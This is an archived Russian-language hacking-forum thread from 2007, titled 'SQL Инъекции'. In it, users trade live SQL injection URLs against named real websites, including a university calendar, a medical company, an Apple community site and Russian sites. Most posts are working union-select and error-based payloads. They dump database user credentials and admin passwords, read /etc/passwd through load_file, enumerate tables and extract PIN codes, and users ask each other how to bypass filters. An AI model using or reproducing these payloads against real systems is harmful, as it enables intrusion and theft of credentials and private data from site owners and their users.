FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 263 из 1602

263

Опции темы

Поиск в этой теме

Опции просмотра

10.07.2007, 17:53

helat

Участник форума

Регистрация: 22.01.2007

Сообщений: 218

Провел на форуме:
1852162

Репутация: 156

Цитата:

Сообщение от Y.Dmitriy

САЙТ ГОСУДАРСТВЕННОЙ НАЛОГОВОЙ АДМИНИСТРАЦИИ УКРАИНЫ
!!!!СЦУКО НЕНАВИЖУ!!!

Ещё бы пасс.
Супер

11.07.2007, 06:11

Dr.Frank

Постоянный

Регистрация: 31.07.2002

Сообщений: 312

Провел на форуме:
1212427

Репутация: 187

Отправить сообщение для Dr.Frank с помощью ICQ

http://edcommunity.apple.com/ali/news_feed.php?itemID=9449'+order+by+9/*
http://edcommunity.apple.com/ali/item.php?itemID=11767'+union+select+1/*

P.S.:
как можно обойти это:

Код:

http://edcommunity.apple.com/ali/search.php?collectionID=1234&order=1+union+select+1,2/*

11.07.2007, 08:58

Dr.Frank

Постоянный

Регистрация: 31.07.2002

Сообщений: 312

Провел на форуме:
1212427

Репутация: 187

MsSql:

http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=@@versi on--
http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(select +db_name())--
http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(select +system_user)--

Таблицы:
D99_Tmp
Category
D99_CMD
Dic_BodyPart
Dic_HX
Dic_Language
Dic_State
Dic_Test
dtproperties
ip
Message
Rights
Role
SessionAction
SessionLog
Siwebtmp
Subscriber
sysconstraints
syssegments
systables
User
v_Category
v_Rights
v_SessionActions

Нашел все колонки в таблице User:
ID
RoleRef
System
Name
Password
FirstName
LastName
EMail

Не получилось последнее:

Код:

http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(SELECT+TOP+1+Name+from+User+where+ID=3)--

Как реализовать?

Последний раз редактировалось Dr.Frank; 11.07.2007 в 09:09..

11.07.2007, 09:17

~~a1ex~~

Banned

Регистрация: 11.10.2006

Сообщений: 682

Провел на форуме:
3750406

Репутация: 271

Отправить сообщение для a1ex с помощью ICQ

Отправить сообщение для a1ex с помощью AIM

Отправить сообщение для a1ex с помощью MSN

Отправить сообщение для a1ex с помощью Yahoo

Код:

http://www.ofmusic.ru/mat/index.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12+from+information_schema.columns/*&mid=796

11.07.2007, 15:55

ENFIX

Участник форума

Регистрация: 06.06.2006

Сообщений: 213

Провел на форуме:
1628290

Репутация: 474

Отправить сообщение для ENFIX с помощью ICQ

University of Arkansas Pine Bluff =)

Код:

http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,user(),3,4,version(),6,7/*

Код:

http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,concat(user,0x3a,password),3,4,5,6,7+from+mysql.user/*

Код:

http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,2,3,4,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),6,7/*

Код:

http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,2,3,4,load_file(char(47,101,116,99,47,104,111,115,116,115)),6,7/*

Код:

http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,concat(AdminID,0x3a,AdminName,0x3a,AdminLoginName,0x3a,AdminPassword),3,4,5,6,7+from+admin/*

11.07.2007, 17:17

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

Провел на форуме:
7192869

Репутация: 3033

http://www.anycorp.com/log/log.php?id=-9+union+select+1,2,3,4/*

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

11.07.2007, 20:02

0nep@t0p

Участник форума

Регистрация: 25.05.2007

Сообщений: 147

Провел на форуме:
2313429

Репутация: 728

http://zaki.ru/pagesnew.php?id=-1+union+select+1,2,3/*
2 I-I()/Ib
Sorry, лишний дописал

Последний раз редактировалось 0nep@t0p; 12.07.2007 в 05:45..

11.07.2007, 21:48

Dr.Z3r0

Leaders of The World

Регистрация: 06.07.2007

Сообщений: 246

Провел на форуме:
2030482

Репутация: 1796

Цитата:

http://zaki.ru/pagesnew.php?id=-1+union+select+1,2,3,4/*

Шо за нах? Вообще то там три столбца.... То бишь вот так:
http://zaki.ru/pagesnew.php?id=-1+union+select+1,2,3/*

__________________

Кто я?..

12.07.2007, 02:30

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

Цитата:

Сообщение от А. С. Грибоедова ("Горе от ума")

А судьи кто?

Код:

http://www.vkks.ru/edit_ks.php?id=-1508%20union%20select%201,2,3,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),1),1),5,6,7,8,9,10,11%20from%20mysql.user/*

__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 12.07.2007 в 02:36..

#10

12.07.2007, 09:17

iRedX

Участник форума

Регистрация: 18.06.2002

Сообщений: 126

Провел на форуме:
65642

Репутация: 46

Отправить сообщение для iRedX с помощью ICQ

Отправить сообщение для iRedX с помощью MSN

http://www.zonewm.biz/showasf.php?id=4+union+select+1,mail,3,pass,5,6,7, 8,9+from+user/*

http://www.webmarket.mobi/wm.php?id=3+union+select+1,2,table_name,4,5,6+from +information_schema.tables/*

http://www.webmarket.mobi/wm.php?id=3+union+select+1,p_user,pin_kod,4,ktype_ karta,6+from+karty_pin/*